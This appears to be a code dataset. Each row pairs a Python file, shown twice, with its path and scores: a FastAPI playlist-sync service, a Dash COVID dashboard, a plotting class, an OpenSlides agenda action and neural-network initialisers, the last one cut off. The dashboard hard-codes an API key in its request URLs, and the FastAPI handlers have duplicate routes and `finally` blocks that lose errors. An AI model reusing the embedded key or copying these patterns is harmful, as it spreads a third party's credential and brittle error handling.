from api.spoti import get_user_playlists, get_linked_playlists
from db.base_repository import init, link_lists,unlink_list,get_linked_lists
app = FastAPI()
client_key = APIKeyHeader(name='client_key')
@app.on_event("startup")
async def startup_event():
init(app)
global scope
async def authenticate(
client_key: str = Security(client_key)
):
permission = await AuthRepository().authenticate(client_key)
if permission is None:
raise HTTPException(status_code=401, detail='unathenticated: missing client_key')
return permission
@app.get("/playlists")
async def my_playlists(permission: APIPermission = Depends(authenticate)):
try:
pl = None
pl = await get_user_playlists(permission)
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if pl is None:
raise HTTPException(status_code=404, detail="no playlists found")
return pl
@app.get("/linked-playlists")
async def linked_playlists(permission: APIPermission = Depends(authenticate)):
try:
pl = None
pl = await get_linked_playlists(permission)
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if pl is None:
raise HTTPException(status_code=404, detail="no playlists found")
return pl
@app.post("/linked_playlists/{sync_from_id}/{sync_to_id}")
async def link_playlists(sync_from_id, sync_to_id):
try:
await link_lists(sync_from=sync_from_id.strip(), sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally: return 'Success!'
@app.delete("/linked_playlists/{sync_from_id}/{sync_to_id}")
async def unlink_playlists(sync_from_id, sync_to_id):
try:
delete_count = await unlink_list(sync_from=sync_from_id.strip(), sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_from_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlist/{sync_from_id}")
async def unlink_playlists(sync_from_id):
try:
delete_count = await unlink_list(sync_from=sync_from_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_from_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlist/{sync_to_id}")
async def unlink_playlists(sync_to_id):
try:
delete_count = await unlink_list(sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_to_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlists")
async def unlink_playlists():
try:
delete_count = await unlink_list()
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"no playlists found for deletion"
)
return f'deleted {delete_count} items'
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000) | main.py | from fastapi import FastAPI, HTTPException, Depends, Security
from models.api_permission import APIPermission
from fastapi.security.api_key import APIKeyHeader
from fastapi import FastAPI
from fastapi.security.api_key import APIKeyHeader
import uvicorn
from core.auth_repository import AuthRepository
from api.spoti import get_user_playlists, get_linked_playlists
from db.base_repository import init, link_lists,unlink_list,get_linked_lists
app = FastAPI()
client_key = APIKeyHeader(name='client_key')
@app.on_event("startup")
async def startup_event():
init(app)
global scope
async def authenticate(
client_key: str = Security(client_key)
):
permission = await AuthRepository().authenticate(client_key)
if permission is None:
raise HTTPException(status_code=401, detail='unathenticated: missing client_key')
return permission
@app.get("/playlists")
async def my_playlists(permission: APIPermission = Depends(authenticate)):
try:
pl = None
pl = await get_user_playlists(permission)
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if pl is None:
raise HTTPException(status_code=404, detail="no playlists found")
return pl
@app.get("/linked-playlists")
async def linked_playlists(permission: APIPermission = Depends(authenticate)):
try:
pl = None
pl = await get_linked_playlists(permission)
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if pl is None:
raise HTTPException(status_code=404, detail="no playlists found")
return pl
@app.post("/linked_playlists/{sync_from_id}/{sync_to_id}")
async def link_playlists(sync_from_id, sync_to_id):
try:
await link_lists(sync_from=sync_from_id.strip(), sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally: return 'Success!'
@app.delete("/linked_playlists/{sync_from_id}/{sync_to_id}")
async def unlink_playlists(sync_from_id, sync_to_id):
try:
delete_count = await unlink_list(sync_from=sync_from_id.strip(), sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_from_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlist/{sync_from_id}")
async def unlink_playlists(sync_from_id):
try:
delete_count = await unlink_list(sync_from=sync_from_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_from_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlist/{sync_to_id}")
async def unlink_playlists(sync_to_id):
try:
delete_count = await unlink_list(sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_to_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlists")
async def unlink_playlists():
try:
delete_count = await unlink_list()
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"no playlists found for deletion"
)
return f'deleted {delete_count} items'
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000) | 0.383988 | 0.053626 |
import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import requests
import csv
import dash
from dash import dcc
from dash import html
"""functions for state data"""
def hist_covid_state_data():
'''func to get historic covid data by state'''
url_hist = r"https://api.covidactnow.org/v2/states.timeseries.csv?apiKey=e00f7fdd626a4ac3a6531d10385bf552"
response = requests.get(url_hist)
# code to take the response and write it to a csv line by line
with open('hist_state.csv', 'w') as f:
writer = csv.writer(f)
for line in response.iter_lines():
writer.writerow(line.decode('utf-8').split(','))
hist_data = pd.read_csv("hist_state.csv",index_col=[0]) # taking the csv into a df
hist_data.dropna(how='all',inplace=True) # removing completely empty rows
hist_data.to_csv("hist_state.csv") # saving the new df to a csv
def current_covid_state_data():
'''function to get just current covid data by state 14 days ago'''
state_df = pd.read_csv("hist_state.csv") #reading the csv
last_item = state_df['date'].iloc[-14] # getting the last item in the date col
filter_df = state_df['date'] == last_item
final_state_df = state_df[filter_df]
final_state_df.to_csv("current_state.csv") # saving updated csv to file
return final_state_df
hist_covid_state_data() # getting the state data
state_data_df = current_covid_state_data() # transforming the state data to be usable and storing a df
# converting the total cases and total deaths to ints first to remove the .0 at the end when converting to string later
state_data_df['actuals.cases'] = state_data_df['actuals.cases'].apply(int)
state_data_df['actuals.deaths'] = state_data_df['actuals.deaths'].apply(int)
# here im adding another col to the df, which is a string with extra infomation by state
state_data_df['text'] = state_data_df['state']+'<br>'+\
'Total Cases ' + state_data_df['actuals.cases'].astype(str)+ '<br>' + \
'Total Deaths ' + state_data_df['actuals.deaths'].astype(str)
# building state map graph
fig_state = go.Figure(data=go.Choropleth(
locations=state_data_df['state'], # Spatial coordinates
z = state_data_df['metrics.testPositivityRatio'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Ratio",
text=state_data_df['text']
))
fig_state.update_layout(
title_text = 'Ratio of Positive Tests in the Past 7 Days',
geo_scope='usa', # limite map scope to USA
)
"""functions for US data"""
def hist_covid_us_data():
'''func to get historic covid data by state'''
url_hist = r"https://api.covidactnow.org/v2/country/US.timeseries.csv?apiKey=e00f7fdd626a4ac3a6531d10385bf552"
response = requests.get(url_hist)
# code to take the response and write it to a csv line by line
with open('hist_us.csv', 'w') as f:
writer = csv.writer(f)
for line in response.iter_lines():
writer.writerow(line.decode('utf-8').split(','))
hist_data = pd.read_csv("hist_us.csv",index_col=[0]) # taking the csv into a df
hist_data.dropna(how='all',inplace=True) # removing completely empty rows
hist_data.to_csv("hist_us.csv") # saving the new df to a csv
def current_covid_us_data():
'''function to get just current covid data by state 14 days ago'''
us_df = pd.read_csv("hist_us.csv") #reading the csv
last_item = us_df['date'].iloc[-14] # getting the last item in the date col
filter_df = us_df['date'] == last_item
final_us_df = us_df[filter_df]
final_us_df.to_csv("current_us.csv") # saving updated csv to file
return final_us_df
hist_covid_us_data() # running func to get US historal data
us_df = pd.read_csv('hist_us.csv') # building df for us hist data
# building line chart for US cases
figure_us_hist = go.Figure()
figure_us_hist.add_trace(go.Scatter(x=us_df['date'],
y=us_df['metrics.caseDensity']))
figure_us_hist.update_layout(title='Number of cases per 100k population using a 7-day rolling average',
xaxis_title = 'Date',
yaxis_title='Cases',
plot_bgcolor='white')
# building a table graph for vaccines and other info
figure_vaccine = go.Figure(data=[go.Table(
header=dict(values=['State',
'Complete Vaccination Ratio',
'ICU Bed Ratio',
'Case Density per 100K'],
fill_color='lightsteelblue',
line_color='black',
align='left'),
cells=dict(values=[state_data_df['state'],
state_data_df['metrics.vaccinationsCompletedRatio'],
state_data_df['metrics.icuCapacityRatio'],
state_data_df['metrics.caseDensity']],
fill_color='white',
line_color='black',
align='left'))
])
figure_vaccine.update_layout(title='Vaccine Completion, ICU Capacity, and Case Density Rates')
# building the dash app
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__,external_stylesheets=external_stylesheets)
app.title = 'Covid Tracking WIP'
app.layout = html.Div(children=[
# All elements from the top of the page
html.Div([
html.Div([
html.H1(children='Covid Tracking'),
html.Div(children=''),
dcc.Graph(
id='graph1',
figure=fig_state
),
], className='six columns'),
html.Div([
html.H1(children='WIP'),
html.Div(children=''),
dcc.Graph(
id='graph2',
figure=figure_vaccine
),
], className='six columns'),
], className='row'),
# New Div for all elements in the new 'row' of the page
html.Div([
html.H1(children=''),
html.Div(children='''
'''),
dcc.Graph(
id='graph3',
figure=figure_us_hist
),
], className='row'),
])
if __name__ == '__main__':
app.run_server(debug=False) # this needs to be false for some reason | dash app wip.py | import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import requests
import csv
import dash
from dash import dcc
from dash import html
"""functions for state data"""
def hist_covid_state_data():
'''func to get historic covid data by state'''
url_hist = r"https://api.covidactnow.org/v2/states.timeseries.csv?apiKey=e00f7fdd626a4ac3a6531d10385bf552"
response = requests.get(url_hist)
# code to take the response and write it to a csv line by line
with open('hist_state.csv', 'w') as f:
writer = csv.writer(f)
for line in response.iter_lines():
writer.writerow(line.decode('utf-8').split(','))
hist_data = pd.read_csv("hist_state.csv",index_col=[0]) # taking the csv into a df
hist_data.dropna(how='all',inplace=True) # removing completely empty rows
hist_data.to_csv("hist_state.csv") # saving the new df to a csv
def current_covid_state_data():
'''function to get just current covid data by state 14 days ago'''
state_df = pd.read_csv("hist_state.csv") #reading the csv
last_item = state_df['date'].iloc[-14] # getting the last item in the date col
filter_df = state_df['date'] == last_item
final_state_df = state_df[filter_df]
final_state_df.to_csv("current_state.csv") # saving updated csv to file
return final_state_df
hist_covid_state_data() # getting the state data
state_data_df = current_covid_state_data() # transforming the state data to be usable and storing a df
# converting the total cases and total deaths to ints first to remove the .0 at the end when converting to string later
state_data_df['actuals.cases'] = state_data_df['actuals.cases'].apply(int)
state_data_df['actuals.deaths'] = state_data_df['actuals.deaths'].apply(int)
# here im adding another col to the df, which is a string with extra infomation by state
state_data_df['text'] = state_data_df['state']+'<br>'+\
'Total Cases ' + state_data_df['actuals.cases'].astype(str)+ '<br>' + \
'Total Deaths ' + state_data_df['actuals.deaths'].astype(str)
# building state map graph
fig_state = go.Figure(data=go.Choropleth(
locations=state_data_df['state'], # Spatial coordinates
z = state_data_df['metrics.testPositivityRatio'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Ratio",
text=state_data_df['text']
))
fig_state.update_layout(
title_text = 'Ratio of Positive Tests in the Past 7 Days',
geo_scope='usa', # limite map scope to USA
)
"""functions for US data"""
def hist_covid_us_data():
'''func to get historic covid data by state'''
url_hist = r"https://api.covidactnow.org/v2/country/US.timeseries.csv?apiKey=e00f7fdd626a4ac3a6531d10385bf552"
response = requests.get(url_hist)
# code to take the response and write it to a csv line by line
with open('hist_us.csv', 'w') as f:
writer = csv.writer(f)
for line in response.iter_lines():
writer.writerow(line.decode('utf-8').split(','))
hist_data = pd.read_csv("hist_us.csv",index_col=[0]) # taking the csv into a df
hist_data.dropna(how='all',inplace=True) # removing completely empty rows
hist_data.to_csv("hist_us.csv") # saving the new df to a csv
def current_covid_us_data():
'''function to get just current covid data by state 14 days ago'''
us_df = pd.read_csv("hist_us.csv") #reading the csv
last_item = us_df['date'].iloc[-14] # getting the last item in the date col
filter_df = us_df['date'] == last_item
final_us_df = us_df[filter_df]
final_us_df.to_csv("current_us.csv") # saving updated csv to file
return final_us_df
hist_covid_us_data() # running func to get US historal data
us_df = pd.read_csv('hist_us.csv') # building df for us hist data
# building line chart for US cases
figure_us_hist = go.Figure()
figure_us_hist.add_trace(go.Scatter(x=us_df['date'],
y=us_df['metrics.caseDensity']))
figure_us_hist.update_layout(title='Number of cases per 100k population using a 7-day rolling average',
xaxis_title = 'Date',
yaxis_title='Cases',
plot_bgcolor='white')
# building a table graph for vaccines and other info
figure_vaccine = go.Figure(data=[go.Table(
header=dict(values=['State',
'Complete Vaccination Ratio',
'ICU Bed Ratio',
'Case Density per 100K'],
fill_color='lightsteelblue',
line_color='black',
align='left'),
cells=dict(values=[state_data_df['state'],
state_data_df['metrics.vaccinationsCompletedRatio'],
state_data_df['metrics.icuCapacityRatio'],
state_data_df['metrics.caseDensity']],
fill_color='white',
line_color='black',
align='left'))
])
figure_vaccine.update_layout(title='Vaccine Completion, ICU Capacity, and Case Density Rates')
# building the dash app
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__,external_stylesheets=external_stylesheets)
app.title = 'Covid Tracking WIP'
app.layout = html.Div(children=[
# All elements from the top of the page
html.Div([
html.Div([
html.H1(children='Covid Tracking'),
html.Div(children=''),
dcc.Graph(
id='graph1',
figure=fig_state
),
], className='six columns'),
html.Div([
html.H1(children='WIP'),
html.Div(children=''),
dcc.Graph(
id='graph2',
figure=figure_vaccine
),
], className='six columns'),
], className='row'),
# New Div for all elements in the new 'row' of the page
html.Div([
html.H1(children=''),
html.Div(children='''
'''),
dcc.Graph(
id='graph3',
figure=figure_us_hist
),
], className='row'),
])
if __name__ == '__main__':
app.run_server(debug=False) # this needs to be false for some reason | 0.445409 | 0.314682 |
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from matplotlib.ticker import ScalarFormatter
from mpl_toolkits.mplot3d import Axes3D
class Plot2d(object):
def __init__(self, workdir, filepath, ndesign, nobject, name):
self.workdir = workdir
self.filepath = filepath
self.ndesign = ndesign
self.nobject = nobject
self.name = name
# フォントの設定
plt.rcParams['font.family'] = 'serif' # 使用するフォント
plt.rcParams['font.size'] = 8 # フォントの大きさ
# 軸の設定
plt.rcParams['xtick.direction'] = 'in' # x軸の目盛線が内向き('in')か外向き('out')か双方向か('inout')
plt.rcParams['ytick.direction'] = 'in' # y軸の目盛線が内向き('in')か外向き('out')か双方向か('inout')
plt.rcParams['xtick.major.width'] = 1.0 # x軸主目盛り線の幅
plt.rcParams['ytick.major.width'] = 1.0 # y軸主目盛り線の幅
plt.rcParams['axes.linewidth'] = 1.0 # 軸の線幅edge linewidth。囲みの太さ
plt.rcParams['grid.linestyle']='--' # グリッド線を破線に
# 凡例の設定
plt.rcParams["legend.markerscale"] = 1
plt.rcParams["legend.fancybox"] = False
plt.rcParams["legend.framealpha"] = 1
plt.rcParams["legend.edgecolor"] = 'black'
def plot(self, header):
self.header = header
# CSVからデータ読み込み.1行目は列名として指定
data = pd.read_csv(self.filepath, header = self.header) # index(=行名)はheader行の次の行を0として付与してくれる
obj_data = data.iloc[:, self.ndesign:self.ndesign + self.nobject]
# 2Dグラフの作成
fig = plt.figure(figsize=(3.4, 3.4)) # プロットエリアが正方形になるように
ax = fig.add_subplot(1, 1, 1)
# 2D散布図の作成
ax.scatter(obj_data.iloc[:, 0], obj_data.iloc[:, 1], s=10, c='blue', edgecolors='black', linewidths='1', marker='o', alpha = '0.5')
# ラベルの指定
ax.set_xlabel(r'Object Function 1')
ax.set_ylabel(r'Object Function 2')
# グラフタイトルの設定
ax.set_title(self.name)
# 軸目盛りの指数表示指定
ax.xaxis.set_major_formatter(FixedOrderFormatter(useMathText=True))
ax.yaxis.set_major_formatter(FixedOrderFormatter(useMathText=True))
ax.ticklabel_format(style="sci", scilimits=(0,0), axis="both")
#ax.set_xlim(self.xmin, self.xmax)
#ax.set_ylim(self.ymin, self.ymax)
# グリッド
ax.grid(zorder=0)
# 凡例の表示
#ax.legend(loc='upper right') # locで場所の固定
# グラフの保存
plt.savefig(self.workdir + '/' + self.name + '.png', format='png', dpi=600, bbox_inches="tight", pad_inches=0.05)
# グラフの表示
plt.show()
#クラス設定 ※ScalarFormatterを継承
class FixedOrderFormatter(ScalarFormatter):
def __init__(self, order_of_mag=0, useOffset=True, useMathText=True):
self._order_of_mag = order_of_mag
ScalarFormatter.__init__(self, useOffset=useOffset,
useMathText=useMathText)
def _set_orderOfMagnitude(self, range):
self.orderOfMagnitude = self._order_of_mag | plot2d.py | import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from matplotlib.ticker import ScalarFormatter
from mpl_toolkits.mplot3d import Axes3D
class Plot2d(object):
def __init__(self, workdir, filepath, ndesign, nobject, name):
self.workdir = workdir
self.filepath = filepath
self.ndesign = ndesign
self.nobject = nobject
self.name = name
# フォントの設定
plt.rcParams['font.family'] = 'serif' # 使用するフォント
plt.rcParams['font.size'] = 8 # フォントの大きさ
# 軸の設定
plt.rcParams['xtick.direction'] = 'in' # x軸の目盛線が内向き('in')か外向き('out')か双方向か('inout')
plt.rcParams['ytick.direction'] = 'in' # y軸の目盛線が内向き('in')か外向き('out')か双方向か('inout')
plt.rcParams['xtick.major.width'] = 1.0 # x軸主目盛り線の幅
plt.rcParams['ytick.major.width'] = 1.0 # y軸主目盛り線の幅
plt.rcParams['axes.linewidth'] = 1.0 # 軸の線幅edge linewidth。囲みの太さ
plt.rcParams['grid.linestyle']='--' # グリッド線を破線に
# 凡例の設定
plt.rcParams["legend.markerscale"] = 1
plt.rcParams["legend.fancybox"] = False
plt.rcParams["legend.framealpha"] = 1
plt.rcParams["legend.edgecolor"] = 'black'
def plot(self, header):
self.header = header
# CSVからデータ読み込み.1行目は列名として指定
data = pd.read_csv(self.filepath, header = self.header) # index(=行名)はheader行の次の行を0として付与してくれる
obj_data = data.iloc[:, self.ndesign:self.ndesign + self.nobject]
# 2Dグラフの作成
fig = plt.figure(figsize=(3.4, 3.4)) # プロットエリアが正方形になるように
ax = fig.add_subplot(1, 1, 1)
# 2D散布図の作成
ax.scatter(obj_data.iloc[:, 0], obj_data.iloc[:, 1], s=10, c='blue', edgecolors='black', linewidths='1', marker='o', alpha = '0.5')
# ラベルの指定
ax.set_xlabel(r'Object Function 1')
ax.set_ylabel(r'Object Function 2')
# グラフタイトルの設定
ax.set_title(self.name)
# 軸目盛りの指数表示指定
ax.xaxis.set_major_formatter(FixedOrderFormatter(useMathText=True))
ax.yaxis.set_major_formatter(FixedOrderFormatter(useMathText=True))
ax.ticklabel_format(style="sci", scilimits=(0,0), axis="both")
#ax.set_xlim(self.xmin, self.xmax)
#ax.set_ylim(self.ymin, self.ymax)
# グリッド
ax.grid(zorder=0)
# 凡例の表示
#ax.legend(loc='upper right') # locで場所の固定
# グラフの保存
plt.savefig(self.workdir + '/' + self.name + '.png', format='png', dpi=600, bbox_inches="tight", pad_inches=0.05)
# グラフの表示
plt.show()
#クラス設定 ※ScalarFormatterを継承
class FixedOrderFormatter(ScalarFormatter):
def __init__(self, order_of_mag=0, useOffset=True, useMathText=True):
self._order_of_mag = order_of_mag
ScalarFormatter.__init__(self, useOffset=useOffset,
useMathText=useMathText)
def _set_orderOfMagnitude(self, range):
self.orderOfMagnitude = self._order_of_mag | 0.438304 | 0.464416 |
from typing import Optional
from ....models.models import AgendaItem
from ....services.datastore.commands import GetManyRequest
from ....shared.patterns import FullQualifiedId
from ...generics.update import UpdateAction
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
from ...util.typing import ActionPayload
@register_action("agenda_item.update")
class AgendaItemUpdate(UpdateAction):
"""
Action to update agenda items.
"""
model = AgendaItem()
schema = DefaultSchema(AgendaItem()).get_update_schema(
optional_properties=[
"item_number",
"comment",
"closed",
"type",
"weight",
"tag_ids",
"duration",
]
)
def calc_is_internal(
self, type_: Optional[int], parent_is_internal: Optional[bool]
) -> bool:
return type_ == AgendaItem.INTERNAL_ITEM or bool(parent_is_internal)
def calc_is_hidden(
self, type_: Optional[int], parent_is_hidden: Optional[bool]
) -> bool:
return type_ == AgendaItem.HIDDEN_ITEM or bool(parent_is_hidden)
def handle_children(
self, id_: int, parent_is_hidden: bool, parent_is_internal: bool
) -> ActionPayload:
instances = []
agenda_item = self.datastore.get(
FullQualifiedId(self.model.collection, id_), ["child_ids"]
)
if agenda_item.get("child_ids"):
get_many_request = GetManyRequest(
self.model.collection,
agenda_item["child_ids"],
["type", "is_hidden", "is_internal"],
)
gm_result = self.datastore.get_many([get_many_request])
children = gm_result.get(self.model.collection, {})
for child_id in children:
child_ai = children[child_id]
instance = dict()
instance["id"] = child_id
instance["is_hidden"] = self.calc_is_hidden(
child_ai.get("type"), parent_is_hidden
)
instance["is_internal"] = self.calc_is_internal(
child_ai.get("type"), parent_is_internal
)
if (
child_ai.get("is_hidden") == instance["is_hidden"]
and child_ai.get("is_internal") == instance["is_internal"]
):
continue
instances.append(instance)
instances.extend(
self.handle_children(
child_id,
bool(instance["is_hidden"]),
bool(instance["is_internal"]),
)
)
return instances
def get_updated_instances(self, payload: ActionPayload) -> ActionPayload:
new_instances = []
agenda_item_ids = [instance["id"] for instance in payload]
get_many_request = GetManyRequest(
self.model.collection, agenda_item_ids, ["parent_id"]
)
gm_result = self.datastore.get_many([get_many_request])
agenda_items = gm_result.get(self.model.collection, {})
for instance in payload:
if instance.get("type") is None:
new_instances.append(instance)
continue
agenda_item = agenda_items[instance["id"]]
if agenda_item.get("parent_id"):
parent_ai = self.datastore.get(
FullQualifiedId(self.model.collection, agenda_item["parent_id"]),
["is_hidden", "is_internal"],
)
else:
parent_ai = {"is_hidden": False, "is_internal": False}
instance["is_hidden"] = self.calc_is_hidden(
instance["type"], parent_ai.get("is_hidden")
)
instance["is_internal"] = self.calc_is_internal(
instance["type"], parent_ai.get("is_internal")
)
new_instances.append(instance)
new_instances.extend(
self.handle_children(
instance["id"], instance["is_hidden"], instance["is_internal"]
)
)
return new_instances | openslides_backend/action/actions/agenda_item/update.py | from typing import Optional
from ....models.models import AgendaItem
from ....services.datastore.commands import GetManyRequest
from ....shared.patterns import FullQualifiedId
from ...generics.update import UpdateAction
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
from ...util.typing import ActionPayload
@register_action("agenda_item.update")
class AgendaItemUpdate(UpdateAction):
"""
Action to update agenda items.
"""
model = AgendaItem()
schema = DefaultSchema(AgendaItem()).get_update_schema(
optional_properties=[
"item_number",
"comment",
"closed",
"type",
"weight",
"tag_ids",
"duration",
]
)
def calc_is_internal(
self, type_: Optional[int], parent_is_internal: Optional[bool]
) -> bool:
return type_ == AgendaItem.INTERNAL_ITEM or bool(parent_is_internal)
def calc_is_hidden(
self, type_: Optional[int], parent_is_hidden: Optional[bool]
) -> bool:
return type_ == AgendaItem.HIDDEN_ITEM or bool(parent_is_hidden)
def handle_children(
self, id_: int, parent_is_hidden: bool, parent_is_internal: bool
) -> ActionPayload:
instances = []
agenda_item = self.datastore.get(
FullQualifiedId(self.model.collection, id_), ["child_ids"]
)
if agenda_item.get("child_ids"):
get_many_request = GetManyRequest(
self.model.collection,
agenda_item["child_ids"],
["type", "is_hidden", "is_internal"],
)
gm_result = self.datastore.get_many([get_many_request])
children = gm_result.get(self.model.collection, {})
for child_id in children:
child_ai = children[child_id]
instance = dict()
instance["id"] = child_id
instance["is_hidden"] = self.calc_is_hidden(
child_ai.get("type"), parent_is_hidden
)
instance["is_internal"] = self.calc_is_internal(
child_ai.get("type"), parent_is_internal
)
if (
child_ai.get("is_hidden") == instance["is_hidden"]
and child_ai.get("is_internal") == instance["is_internal"]
):
continue
instances.append(instance)
instances.extend(
self.handle_children(
child_id,
bool(instance["is_hidden"]),
bool(instance["is_internal"]),
)
)
return instances
def get_updated_instances(self, payload: ActionPayload) -> ActionPayload:
new_instances = []
agenda_item_ids = [instance["id"] for instance in payload]
get_many_request = GetManyRequest(
self.model.collection, agenda_item_ids, ["parent_id"]
)
gm_result = self.datastore.get_many([get_many_request])
agenda_items = gm_result.get(self.model.collection, {})
for instance in payload:
if instance.get("type") is None:
new_instances.append(instance)
continue
agenda_item = agenda_items[instance["id"]]
if agenda_item.get("parent_id"):
parent_ai = self.datastore.get(
FullQualifiedId(self.model.collection, agenda_item["parent_id"]),
["is_hidden", "is_internal"],
)
else:
parent_ai = {"is_hidden": False, "is_internal": False}
instance["is_hidden"] = self.calc_is_hidden(
instance["type"], parent_ai.get("is_hidden")
)
instance["is_internal"] = self.calc_is_internal(
instance["type"], parent_ai.get("is_internal")
)
new_instances.append(instance)
new_instances.extend(
self.handle_children(
instance["id"], instance["is_hidden"], instance["is_internal"]
)
)
return new_instances | 0.744471 | 0.218273 |
import os
import numpy as np
from time import time
import joblib
import theano
import theano.tensor as T
from foxhound.theano_utils import sharedX, floatX, intX
from foxhound.rng import np_rng
class W2VEmbedding(object):
def __init__(self, data_dir):
self.data_dir = data_dir
def __call__(self, vocab, name=None):
t = time()
w2v_vocab = joblib.load(os.path.join(self.data_dir, '3m_w2v_gn_vocab.jl'))
w2v_embed = joblib.load(os.path.join(self.data_dir, '3m_w2v_gn.jl'))
mapping = {}
for i, w in enumerate(w2v_vocab):
w = w.lower()
if w in mapping:
mapping[w].append(i)
else:
mapping[w] = [i]
widxs = []
w2vidxs = []
for i, w in enumerate(vocab):
w = w.replace('`', "'")
if w in mapping:
w2vi = min(mapping[w])
w2vidxs.append(w2vi)
widxs.append(i)
w = np.zeros((len(vocab), w2v_embed.shape[1]))
w[widxs, :] = w2v_embed[w2vidxs, :]/2.
return sharedX(w, name=name)
class Uniform(object):
def __init__(self, scale=0.05):
self.scale = 0.05
def __call__(self, shape):
return sharedX(np_rng.uniform(low=-self.scale, high=self.scale, size=shape))
class Normal(object):
def __init__(self, loc=0., scale=0.05):
self.scale = scale
self.loc = loc
def __call__(self, shape, name=None):
return sharedX(np_rng.normal(loc=self.loc, scale=self.scale, size=shape), name=name)
class Orthogonal(object):
""" benanne lasagne ortho init (faster than qr approach)"""
def __init__(self, scale=1.1):
self.scale = scale
def __call__(self, shape, name=None):
flat_shape = (shape[0], np.prod(shape[1:]))
a = np_rng.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v # pick the one with the correct shape
q = q.reshape(shape)
return sharedX(self.scale * q[:shape[0], :shape[1]], name=name)
class Frob(object):
def __init__(self):
pass
def __call__(self, shape, name=None):
r = np_rng.normal(loc=0, scale=0.01, size=shape)
r = r/np.sqrt(np.sum(r**2))*np.sqrt(shape[1])
return sharedX(r, name=name)
class Constant(object):
def __init__(self, c=0.):
self.c = c
def __call__(self, shape):
return sharedX(np.ones(shape) * self.c)
class Identity(object):
def __init__(self, scale=0.25):
self.scale = scale
def __call__(self, shape):
return sharedX(np.identity(shape[0]) * self.scale)
class ReluInit(object):
def __init__(self):
pass
def __call__(self, shape):
if len(shape) == 2:
scale = np.sqrt(2./shape[0])
elif len(shape) == 4:
scale = np.sqrt(2./np.prod(shape[1:]))
else:
raise NotImplementedError
return sharedX(np_rng.normal(size=shape, scale=scale)) | foxhound/inits.py | import os
import numpy as np
from time import time
import joblib
import theano
import theano.tensor as T
from foxhound.theano_utils import sharedX, floatX, intX
from foxhound.rng import np_rng
class W2VEmbedding(object):
def __init__(self, data_dir):
self.data_dir = data_dir
def __call__(self, vocab, name=None):
t = time()
w2v_vocab = joblib.load(os.path.join(self.data_dir, '3m_w2v_gn_vocab.jl'))
w2v_embed = joblib.load(os.path.join(self.data_dir, '3m_w2v_gn.jl'))
mapping = {}
for i, w in enumerate(w2v_vocab):
w = w.lower()
if w in mapping:
mapping[w].append(i)
else:
mapping[w] = [i]
widxs = []
w2vidxs = []
for i, w in enumerate(vocab):
w = w.replace('`', "'")
if w in mapping:
w2vi = min(mapping[w])
w2vidxs.append(w2vi)
widxs.append(i)
w = np.zeros((len(vocab), w2v_embed.shape[1]))
w[widxs, :] = w2v_embed[w2vidxs, :]/2.
return sharedX(w, name=name)
class Uniform(object):
def __init__(self, scale=0.05):
self.scale = 0.05
def __call__(self, shape):
return sharedX(np_rng.uniform(low=-self.scale, high=self.scale, size=shape))
class Normal(object):
def __init__(self, loc=0., scale=0.05):
self.scale = scale
self.loc = loc
def __call__(self, shape, name=None):
return sharedX(np_rng.normal(loc=self.loc, scale=self.scale, size=shape), name=name)
class Orthogonal(object):
""" benanne lasagne ortho init (faster than qr approach)"""
def __init__(self, scale=1.1):
self.scale = scale
def __call__(self, shape, name=None):
flat_shape = (shape[0], np.prod(shape[1:]))
a = np_rng.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v # pick the one with the correct shape
q = q.reshape(shape)
return sharedX(self.scale * q[:shape[0], :shape[1]], name=name)
class Frob(object):
def __init__(self):
